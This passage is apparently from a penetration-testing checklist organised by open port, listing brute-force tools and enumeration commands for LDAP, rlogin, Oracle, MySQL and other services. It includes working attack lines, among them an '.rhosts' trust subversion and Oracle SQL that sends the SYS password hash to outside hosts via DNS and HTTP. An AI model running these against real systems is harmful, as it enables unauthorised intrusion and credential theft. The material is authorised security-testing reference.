ldapmodrdn [-r][-n][-v][-k][-K][-c][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile] [-H ldapuri][-h ldaphost][-p ldapport][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x] [-X authzid][-Y mech][-Z[Z]][-f file][dn rdn]
ldap brute force
bf_ldap
bf_ldap -s server -d domain name -u|-U username | users list file name -L|-l passwords list | length of passwords to generate optional: -p port (default 389) -v (verbose mode) -P Ldap user path (default ,CN=Users,)
K0ldS
LDAP_Brute.pl
Examine Configuration Files
General
containers.ldif
ldap.cfg
ldap.conf
ldap.xml
ldap-config.xml
ldap-realm.xml
slapd.conf
IBM SecureWay V3 server
V3.sas.oc
Microsoft Active Directory server
msadClassesAttrs.ldif
Netscape Directory Server 4
nsslapd.sas_at.conf
nsslapd.sas_oc.conf
OpenLDAP directory server
slapd.sas_at.conf
slapd.sas_oc.conf
Sun ONE Directory Server 5.1
75sas.ldif
PPTP/L2TP/VPN port 500/1723 open
Enumeration
ike-scan
ike-probe
Brute-Force
ike-crack
Reference Material
PSK cracking paper
SecurityFocus Infocus
Scanning a VPN Implementation
Modbus port 502 open
modscan
rlogin port 513 open
Rlogin Enumeration
Find the files
find / -name .rhosts
locate .rhosts
Examine Files
cat .rhosts
Manual Login
rlogin hostname -l username
rlogin <IP>
Subvert the files
echo ++ > .rhosts
Rlogin Brute force
Hydra
rsh port 514 open
Rsh Enumeration
rsh host [-l username] [-n] [-d] [-k realm] [-f | -F] [-x] [-PN | -PO] command
Rsh Brute Force
rsh-grind
Hydra
medusa
SQL Server Port 1433 1434 open
SQL Enumeration
piggy
SQLPing
sqlping ip_address/hostname
SQLPing2
SQLPing3
SQLpoke
SQL Recon
SQLver
SQL Brute Force
SQLPAT
sqlbf -u hashes.txt -d dictionary.dic -r out.rep - Dictionary Attack
sqlbf -u hashes.txt -c default.cm -r out.rep - Brute-Force Attack
SQL Dict
SQLAT
Hydra
SQLlhf
ForceSQL
Citrix port 1494 open
Citrix Enumeration
Default Domain
Published Applications
./citrix-pa-scan {IP_address/file | - | random} [timeout]
citrix-pa-proxy.pl IP_to_proxy_to [Local_IP]
Citrix Brute Force
bforce.js
connect.js
Citrix Brute-forcer
Reference Material
Hacking Citrix - the legitimate backdoor
Hacking Citrix - the forceful way
Oracle Port 1521 Open
Oracle Enumeration
oracsec
Repscan
Sidguess
Scuba
DNS/HTTP Enumeration
SQL> SELECT UTL_INADDR.GET_HOST_ADDRESS((SELECT PASSWORD FROM DBA_USERS WHERE US ERNAME='SYS')||'.vulnerabilityassessment.co.uk') FROM DUAL; SELECT UTL_INADDR.GET_HOST_ADDRESS((SELECT PASSWORD FROM DBA_USERS WHERE USERNAM E='SYS')||'.vulnerabilityassessment.co.uk') FROM DUAL
SQL> select utl_http.request('http://gladius:5500/'||(SELECT PASSWORD FROM DBA_USERS WHERE USERNAME='SYS')) from dual;
WinSID
Oracle default password list
TNSVer
tnsver host [port]
TCP Scan
Oracle TNSLSNR
Will respond to: [ping] [version] [status] [service] [change_password] [help] [reload] [save_config] [set log_directory] [set display_mode] [set log_file] [show] [spawn] [stop]
TNSCmd
perl tnscmd.pl -h ip_address
perl tnscmd.pl version -h ip_address
perl tnscmd.pl status -h ip_address
perl tnscmd.pl -h ip_address --cmdsize (40 - 200)
LSNrCheck
Oracle Security Check (needs credentials)
OAT
sh opwg.sh -s ip_address
opwg.bat -s ip_address
sh oquery.sh -s ip_address -u username -p password -d SID OR c:\oquery -s ip_address -u username -p password -d SID
OScanner
sh oscanner.sh -s ip_address
oscanner.exe -s ip_address
sh reportviewer.sh oscanner_saved_file.xml
reportviewer.exe oscanner_saved_file.xml
NGS Squirrel for Oracle
Service Register
Service-register.exe ip_address
PLSQL Scanner 2008
Oracle Brute Force
OAK
ora-getsid hostname port sid_dictionary_list
ora-auth-alter-session host port sid username password sql
ora-brutesid host port start
ora-pwdbrute host port sid username password-file
ora-userenum host port sid userlistfile
ora-ver -e (-f -l -a) host port
breakable (Targets Application Server Port)
breakable.exe host url [port] [v]host ip_address of the Oracle Portal Serverurl PATH_INFO i.e. /pls/orassoport TCP port Oracle Portal Server is serving pages fromv verbose
SQLInjector (Targets Application Server Port)
sqlinjector -t ip_address -a database -f query.txt -p 80 -gc 200 -ec 500 -k NGS SOFTWARE -gt SQUIRREL
sqlinjector.exe -t ip_address -p 7777 -a where -gc 200 -ec 404 -qf q.txt -f plsql.txt -s oracle
Check Password
orabf
orabf [hash]:[username] [options]
thc-orakel
Cracker
Client
Crypto
DBVisualisor
Sql scripts from pentest.co.uk
Manual sql input of previously reported vulnerabilties
Oracle Reference Material
Understanding SQL Injection
SQL Injection walkthrough
SQL Injection by example
Advanced SQL Injection in Oracle databases
Blind SQL Injection
SQL Cheatsheets
http://ha.ckers.org/sqlinjection
http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/
http://www.0x000000.com/?i=14
http://pentestmonkey.net/
NFS Port 2049 open
NFS Enumeration
showmount -e hostname/ip_address
mount -t nfs ip_address:/directory_found_exported /local_mount_point
NFS Brute Force
Interact with NFS share and try to add/delete
Exploit and Confuse Unix
Examine Configuration Files
/etc/exports
/etc/lib/nfs/xtab
Compaq/HP Insight Manager Port 2301,2381open
HP Enumeration
Authentication Method
Host OS Authentication
Default Authentication
Default Passwords
Wikto
Nstealth
HP Bruteforce
Hydra
Acunetix
Examine Configuration Files
path.properties
mx.log
CLIClientConfig.cfg
database.props
pg_hba.conf
jboss-service.xml
.namazurc
MySQL port 3306 open
Enumeration
nmap -A -n -p3306 <IP Address>
nmap -A -n -PN --script:ALL -p3306 <IP Address>
telnet IP_Address 3306
use test; select * from test;
To check for other DB's -- show databases
Administration
MySQL Network Scanner
MySQL GUI Tools
mysqlshow
mysqlbinlog
Manual Checks
Default usernames and passwords
username: root password:
testing
mysql -h <Hostname> -u root
mysql -h <Hostname> -u root
mysql -h <Hostname> -u root@localhost
mysql -h <Hostname>
mysql -h <Hostname> -u ""@localhost
Configuration Files
Operating System
windows
config.ini
my.ini
windows\my.ini
winnt\my.ini
<InstDir>/mysql/data/
unix
my.cnf
/etc/my.cnf
/etc/mysql/my.cnf
/var/lib/mysql/my.cnf
~/.my.cnf
/etc/my.cnf
Command History
~/.mysql.history
Log Files
connections.log
update.log
common.log
To run many sql commands at once -- mysql -u username -p < manycommands.sql
MySQL data directory (Location specified in my.cnf)
Parent dir = data directory
mysql
test
information_schema (Key information in MySQL)
Complete table list -- select table_schema,table_name from tables;
Exact privileges -- select grantee, table_schema, privilege_type FROM schema_privileges;
File privileges -- select user,file_priv from mysql.user where user='root';
Version -- select version();
Load a specific file -- SELECT LOAD_FILE('FILENAME');
SSL Check
mysql> show variables like 'have_openssl';
If there's no rows returned at all it means the the distro itself doesn't support SSL connections and probably needs to be recompiled. If its disabled it means that the service just wasn't started with ssl and can be easily fixed.
Privilege Escalation
Current Level of access
mysql>select user();